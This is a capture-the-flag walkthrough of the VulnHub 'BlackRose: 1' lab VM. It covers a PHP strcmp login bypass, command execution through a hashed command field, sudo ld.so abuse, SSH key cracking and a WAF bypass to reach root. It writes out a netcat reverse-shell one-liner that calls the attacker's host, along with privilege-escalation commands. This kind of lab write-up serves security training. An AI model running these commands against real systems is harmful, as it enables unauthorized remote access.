Today we are going to solve another boot2root challenge called “BlackRose: 1”. It’s available at VulnHub for penetration testing, you can download this from here.
The credit goes to BadLamer for designing this VM machine. Let’s start and learn how we can break this down.
Penetration Testing Methodology
- ByPassing PHP strcmp()
- Remote Command Execute (RCE) from the application web
- Use of cryptography and cyphers (Cyberchef & others)
- Abuse binary ld.so
- Cracking SSH Keys with John
- Reversing binary with Ghidra
- Abuse script with Filter ByPass extensions and WAF application
- Capture the flag
So, let’s start this all by running up “nmap” with an “aggressive scan”, in order to capture the ports with the enabled operating system, software versions, scripts and traceroutes.
nmap –A –p– 192.168.1.21
As we enter the website, we were presented with an authentication system, which thus allows us to enter some credentials or to register ourselves into it.
On the other hand, we noticed a background image behind the login portal, thus we downloaded it in order to check whether it contains any specific information or not. As we track it over the steghide tool, we got something but we lacked with a key to decipher it.
After trying to evade the form with other techniques, we were clear that this website is vulnerable to “strcmp“.
Let’s capture this request in burpsuite and check what we can have over in its response.
Great!! We execute the answer in our web browser and have bypassed the administration panel as “admin” user.
Now as we go further, inside this panel, we got a hash in “bcrypt” and there is a box to type the input command. But if you try to run the “ls” command, it will pop you back out with an error.
So let’s try to crack this captured hash through John The Ripper. As in the output result, you can see that we got the command as “whoami“.
Let’s now try to execute the “whoami” command in the web-application.
Very well, as we are not aware of the application’s procedures, let’s then try to generate a hash in “bcrypt” with a command that will allow us to raise a reverse shell from our kali machine.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh –i 2>&1|nc 192.168.1.22 1234 >/tmp/f
We’ll now set up a netcat listener at port 1234. Further, change up the field hash and rewrite the command:
Great!! We’ve successfully captured the victim’s Shell.
Privilege Escalation (user “delx”)
Thus with the help of python, we’ll have our interactive shell, now it’s time to get the privileges of the “delx” user.
To do this, we will execute the command “sudo -l” and check whether we can make the use of a binary called “ld.so”, as easy as running:
sudo –u delx /bin/ld.so /bin.sh
From the below image, you can see that we got the shell with the user.
As we traverse the files of the user “delx“, we encounter that it is having the directory as “.ssh”, copy the “id_rsa” file and try to crack it with “ssh2john“, JohnTheRipper and the rockyou dictionary.
Great!! We can now connect it via SSH!
Privilege Escalation (user “yourname”)
Let’s surf the files that were having access to the user “delx” and during the procedure, we were encountered with a binary file called “showPassword“.
Thus the binary will be used to check a password to decipher the content that is marked in green.
We will analyze the code with Ghidra (you can even use some other), check for its decompiler and list the password inside it.
We go back to the binary, type the password and check whether it is correct or not.
Let’s try to decipher the content over some online tools. I’ve used AES encryption to do so. From the below image, you can see that we are now again having another encrypted text to entertain.
After testing this key with all the 3 users, it didn’t work for any of them. Do you remember the background image that we’ve downloaded in the beginning?
Let’s try to do it here.
After checking every possible way, we finally decrypted it as “ROT47“.
Let’s now try the password with the user “yourname” and therefore we’ve finally captured the flag of “user.txt“.
Privilege Escalation (root)
Fire up “sudo -l” and list a script which we can execute as “root“.
As we tried to execute it, we got prompted with a message as “Invalid file read”
It’s clear that we do not have access to the script, but it is also understandable that it can be filtered by the extensions.
After trying to read different extensions, we find one that worked for us i.e. “PHP“!
As you can see, it passes the extension filter, but it doesn’t run the content. This can be because the script might have the “WAF” function and filters some words.
After some documentation, I modified the proof of concept and I managed to bypass the “WAF“.
Well, let’s not waste any more time, and add up “/bin/sh” in order to capture the root’s shell to read the contents of the file “root.txt“.
Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks Contacted on LinkedIn and Twitter.